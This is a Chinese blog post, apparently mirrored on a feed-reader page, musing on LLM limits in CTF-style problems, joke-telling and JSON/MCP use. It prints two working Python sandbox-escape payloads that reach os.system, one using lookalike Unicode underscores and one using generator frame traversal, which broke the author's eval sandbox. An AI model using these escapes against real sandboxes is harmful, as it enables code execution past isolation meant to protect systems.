惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

H
Help Net Security
爱范儿
爱范儿
V
Visual Studio Blog
Last Week in AI
Last Week in AI
阮一峰的网络日志
阮一峰的网络日志
雷峰网
雷峰网
Hugging Face - Blog
Hugging Face - Blog
博客园 - 【当耐特】
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
博客园 - 三生石上(FineUI控件)
博客园 - Franky
博客园 - 叶小钗
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
The Cloudflare Blog
大猫的无限游戏
大猫的无限游戏
人人都是产品经理
人人都是产品经理
M
MIT News - Artificial intelligence
罗磊的独立博客
L
LangChain Blog
Jina AI
Jina AI
IT之家
IT之家
J
Java Code Geeks
Microsoft Azure Blog
Microsoft Azure Blog
博客园_首页

est の 输入 输出和出入

海南之行后记 The httpx 1.0 situation Mimocode/Opencode 的 Responses API 支持 git fetch 实现断点续传 继续搓英汉双解词典v3 邮箱生态调研2026 “畜牲” 飞书并入豆包,文档是否减少? 从菲尔兹奖谈「包养」 iosevka字体让中文 ASCII diagram 图表对齐 为什么 Github OAuth 故意拦截 CORS gitweets改版,复刻微信「朋友圈」 MiMoCode 干完活儿发通知 写作能力和 locate cost grep vs sqlite 谁更适合微信聊天记录? [AI] curl -NT. 导致100% CPU原因 或许「数羊」真是个有效的入睡法 唯物主义「天命」论 我的 Vibe Coding 最佳实践——ADR文档 MacOS 快速插入当前时间 locate cost 基于 git 的零拷贝静态web服务器 AI和柜台费 Sutton 论 discovery Elon Musk 五步工作法 Playlet:DLNA听歌神器 免安装app播放NAS里的歌 不修改nginx接收websocket AI 硬伤 理解LLM的范式——它就是个差分机? 路径依赖
无用之用——或许LLM真的还不是AGI
2026-03-25 · via est の 输入 输出和出入

之前记录的 安全的Python3沙箱——eval 被人破解了。

[
    c._﹍init﹍_._﹍globals﹍_["os"].system("id")
    for c in ()._﹍class﹍_._﹍bases﹍_[0]._﹍subclasses﹍_()
    if c._﹍init﹍_._﹍class﹍_._﹍name﹍_ == "function"
    and "os" in c._﹍init﹍_._﹍globals﹍_
]

(
    L:=[None],
    g:=(x.gi_frame.f_back.f_back.f_builtins for x in L),
    L.clear(),
    L.append(g),
    bi:=g.send(None),
    bi['_'+'_import_'+'_']('os').system('id')
)

其实 opus-4.6-thinking 当时提到了类似思路,但可惜miss了一丁点。

  • AI想到的unicode是 U+FF3F 失败了,这里的 ﹍是 U+FE4D成功了。
  • AI考虑到 gi_frame 但是没能成功写完整。

看到这里我不仅哑然,距离成功就差临门一脚那么一点,但是AI终究不是AGI。人类在钻研死劲上还是胜过AI的。

AI会不会有一些根本性的模式限制呢?我猜现阶段就是它最不太适应的就是这种对抗性的CTF。

pretrain有个 reward model,只预测出一个最恰当的token。RLHF也是高度按照人类喜好去pick一个标准答案的。但是有些任务不是这样的,是全局试错然后留意着,说不定以后从candidate做个奇妙的组合,加工发挥,就有大用。

今年开篇第一篇也写过《LLM的弱点——不能很好的讲笑话》,恰如 LLM产生随机数能力很弱。因为它真的不会去随便挑个角度开始讲笑话,但群众喜闻乐见的「冷笑话」就是这样,冷不丁来一个,笑死人。笑点很奇怪。

LLM过度讨好,就发现不了这种。而且即便发现了也不会记录搜藏用在下一次。。

CTF和讲笑话一样,没有最优解。恰好是偶然你从一个刁钻的角度入手,可能一开始很不起眼,但是你能解决问题

A -> B 死胡同
C -> D 死胡同

B+D居然能解决E。

所以我感觉现阶段LLM是擅长「优化」类任务,把做到极致。但是搜集启发式的活儿,第一是它pretrain没这么教,第二是教了它也不会搜集,memory得靠外挂。

或许人类以后的工作,狩猎式的活儿不用做了,可以去采集类的。如同 CTF奇怪路径某一天突然串通了可以构造一个 exploit,也如同多个违背预期结合可以构成一个笑话

无用之用方为大用?哈哈哈


又刷到这篇 we've all been using MCP wrong

我个人是有切身体会的。AI 其实对 JSON 这种格式掌握一点都不好,经常写出有语法错误的。我现在完全放弃用JSON跟AI交互了,都改为 markdown 段落章节形式了

谁知道,AI居然不习惯JSON这样机械严格的东西,反而喜欢接近自然语言宽松的格式。

Cloudflare博客也强调,与其教AI去调用MCP,不如让AI写对应的代码去调用MCP。AI更习惯写代码。这和Claude某些bash党的观点不谋而合,因为AI培训班就是大量代码和自然文本,JSON其实反而说得少,不习惯啊。

从这个角度说,JSON都写不好的AI,还想什么AGI呢。